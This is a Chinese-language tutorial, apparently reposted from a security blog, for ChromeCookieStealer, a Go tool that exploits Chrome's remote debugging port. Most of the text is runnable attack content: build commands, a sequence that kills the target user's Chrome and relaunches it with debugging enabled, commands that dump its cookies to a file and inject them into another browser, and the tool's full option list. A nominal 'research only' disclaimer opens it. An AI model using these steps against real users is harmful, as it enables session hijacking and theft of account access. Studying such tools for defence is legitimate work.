如何使用ChromeCookieStealer通过开发者工具收集和注入Chrome Cookie

007bug2023-12-08 18:25:34

关于ChromeCookieStealer

ChromeCookieStealer是一款功能强大的Cookie数据收集和注入工具,该工具需要配合Chrome使用,能够利用Chrome的远程DevTools(开发者工具)协议实现浏览器Cookie的数据收集、注入、清理和删除操作。

该工具支持使用Chrome自己的格式并以JSON对象形式转储Cookie数据,Cookie数据的加载和注入同样使用的是这类数据格式。

该工具仅供安全研究和测试使用,请勿将其用于其他目的。

功能介绍

1、转储Chrome浏览器的Cookie数据;
2、将转储的Cookie数据注入到其他Chrome实例中;
3、清理Chrome的Cookie数据;
4、编译过程中支持自定义设置;

工具下载

由于该工具基于Go语言开发,因此我们首先需要在本地设备上安装并配置好Go语言环境。

接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/magisterquis/chromecookiestealer.git

然后切换到项目目录中,使用go build命令构建项目源码:

cd chromecookiestealer

go build

工具快速使用

构建完成后,执行下列命令即可收集目标用户Chrome浏览器中的Cookie数据:

pkill Chrome

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # 需要根据目标情况修改

./chromecookiestealer -dump ./cookies.json

下列命令可以将转储的Cookie数据注入到研究人员的本地浏览器中:

# 使用一个调试端口启动Chrome,具体可参考上面的命令

./chromecookiestealer -clear -inject ./cookies.json

工具帮助信息

Usage: chromecookiestealer [options]

Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)

and, in order and as requested:

 

- Dumps cookies

- Clears cookies

- Injects cookies

- Deletes selected cookies

 

Parameters for cookies to be deleted should be represented as an array of JSON

objects with the following string fields:

 

name   - 要删除的Cookie名称

url    -  删除跟指定域名或URL匹配的所有Cookie

domain - 仅删除指定域名的Cookie

path   - 仅删除指定路径的Cookie

 

Filenames may also be "-" for stdin/stdout.

 

Options:

  -chrome URL

     Chrome远程调试URL (默认为"ws://127.0.0.1:9222")

  -clear

     清理浏览器Cookie

  -delete file

     包含要删除Cookie参数的文件名称

  -dump file

     转储Cookie的文件名称

  -inject file

     需要注入的包含Cookie的文件名称

  -no-summary

     退出时不打印概述信息

  -verbose

     启用Verbose日志

其他编译选项

一般情况下,go build命令足够满足绝大部分用户的需求。如果你需要执行更有针对性的安全测试,可以在编译过程中使用“-ldflags '-X main.Foo=bar'”选项实现自定义配置。

变量

描述

DumpFile

转储Cookie的文件名称,在-dump中设置

InjectFile

需要注入的文件名称,在-inject中设置

DeleteFile


描述需要删除Cookie的文件名称,在-delete中设置


DoClear

是否需要清理Cookie,在-clear中设置


需要注意的是,上述所有的选项/变量默认都是未设置的。

许可证协议

本项目的开发与发布遵循BSD-3-Clause开源许可证协议。

项目地址

ChromeCookieStealer:https://github.com/magisterquis/chromecookiestealer"

参考资料

https://github.com/slyd0g/WhiteChocolateMacademiaNut
https://chromedevtools.github.io/devtools-protocol/tot/Network/#type-Cookie


谷歌浏览器cookie
本作品采用《CC 协议》,转载必须注明作者和本文链接
聊天生成预训练转换器(ChatGPT)在官方Google Chrome商店中作为浏览器扩展提供,使您可以轻松访问这个复杂的聊天机器人。这听起来有多令人兴奋?接下来阅读完整的故事。 两万次下载和数千个商业Facebook帐户遭到入侵,所有这些都来自一个“合法的”假扩展程序。 没错,可以从官方Google商店下载的基于ChatGPT的虚假扩展程序可以合法地轻松访问ChatGPT,但
研究人员发现,网络犯罪分子正在利用Telegram和Discord等流行消息应用程序的内置服务作为现成平台,以帮助他们在威胁用户的持续活动中执行一些不良活动。
写这个是因为考虑到在渗透过程中,对目标机器上的第三方软件的信息收集很大程度决定后续能不能横向移动,内网密码搜集的越多,横向渗透也就越方便,这里将列举常见的软件,远程控制,浏览器,常见数据库相关软件和系统的凭证获取方式。 而有时候因为环境特别严苛,在线解密的工具用不了的时候离线就显得特别重要,做个记录,也当了解一下各个软件之间不同的认证方法,可能有些许理解错误,看官们轻锤。
感染浏览器Cloud9 是一个恶意浏览器扩展,它对 Chromium 浏览器进行感染,以执行大量的恶意功能。Cloud9 的受害者遍布全球,攻击者在论坛上发布的屏幕截图表明他们针对各种浏览器。此外,在网络犯罪论坛上公开宣传 Cloud9 导致 Zimperium 相信 Keksec 可能会将其出售/出租给其他运营商。
运算符和目标Cloud9 背后的黑客有可能与 Keksec 恶意软件组织有联系,因为在最近的活动中使用的 C2 域在 Keksec 过去的攻击中被发现。Cloud9 的受害者遍布全球,攻击者在论坛上发布的屏幕截图表明他们针对各种浏览器。此外,在网络犯罪论坛上公开宣传 Cloud9 导致 Zimperium 相信 Keksec 可能会将其出售/出租给其他运营商。
对于高级攻击者来说,研究人员观察到活跃的攻击者以各种方式获取 cookie。有时,随着特定活动的启动,这些检测结果会急剧上升。此外,一些使用 cookie 的合法应用程序可能会泄露它们,从而将令牌暴露给攻击者。其中一个键值对指定cookie的过期时间,即cookie在必须更新之前的有效时间。
伴随着数字时代的快速发展,用户隐私保护意识正在觉醒,对于隐私保护关注度明显上升。与此同时,全球也拉开了隐私保护的大潮流,从GDPR到个人信息保护法,隐私问题已经成为互联网科技巨头必须直面的“深坑”。
本周,威胁分析小组(TAG)发现,一种Cookie盗窃恶意软件被用于针对YouTube创作者进行网络钓鱼攻击。 来自俄罗斯的黑客“雇佣兵”
据了解,这些有问题的扩展程序已经在Chrome 应用店累计获得了高达140万次的下载。调查结果是在 2022 年 3 月发现13 个 Chrome 浏览器扩展程序之后发现的,这些扩展程序将美国、欧洲和印度的用户重定向到网络钓鱼网站并泄露敏感信息。目前,这5个扩展程序已经从Chrome 网上应用店中删除。
007bug
暂无描述